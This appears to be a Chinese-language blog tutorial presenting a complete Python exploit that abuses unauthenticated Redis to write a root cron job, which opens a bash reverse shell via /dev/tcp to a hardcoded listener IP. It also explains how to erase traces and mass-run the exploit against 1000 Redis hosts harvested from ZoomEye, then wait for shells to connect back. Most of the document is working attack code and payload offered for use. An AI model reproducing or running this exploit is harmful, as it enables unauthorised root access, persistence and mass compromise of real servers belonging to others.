Redis Getshell自动化实践之cron
利用流程
1 通过redis未授权访问漏洞,向redis插入一条记录,内容是反弹shell的定时任务
2 通过redis数据导出功能,将含有定时任务代码的数据导出到/var/spool/cron/root
3 监听端口,获取shell
编写exp
完整代码:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author = [email protected]
# project = https://github.com/Xyntax/POC-T
"""
redis getshell expliot (/var/spool/cron reverse shell)
"""
import redis
from plugin.util import host2IP
from plugin.util import randomString
listen_ip = '115.28.1.1'
listen_port = 9999
def poc(url):
url = host2IP(url)
ip = url.split(':')[0]
port = int(url.split(':')[-1]) if ':' in url else 6379
try:
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,
port=str(listen_port))
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
r.delete(key) # 清除痕迹
r.config_set('dir', '/tmp')
return True
except Exception, e:
# print e
return False
return False
和之前的ssh-key相比简单了点.
首先判断是否存在未授权访问
r = redis.Redis(host=ip, port=port, db=0, socket_timeout=10)
if 'redis_version' in r.info():
构造定时任务代码
listen_ip = '115.28.1.1'
listen_port = 9999
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n'.format(ip=listen_ip,port=str(listen_port))
写入/var/spool/cron/root
path = '/var/spool/cron'
name = 'root'
key = randomString(10)
r.set(key, payload)
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()
清除痕迹
r.delete(key)
r.config_set('dir', '/tmp')
这里没有验证是否真正能反弹,如果有需要的话可以把定时任务代码改成ping,然后使用cloudeye(api已集成到工具中)等dns日志工具做验证.
测试 加载1000个ZoomEye采集的redis站点,也可以使用--api --dork参数直接从ZoomEye采集
然后监听端口,一会就会有shell自动连过来
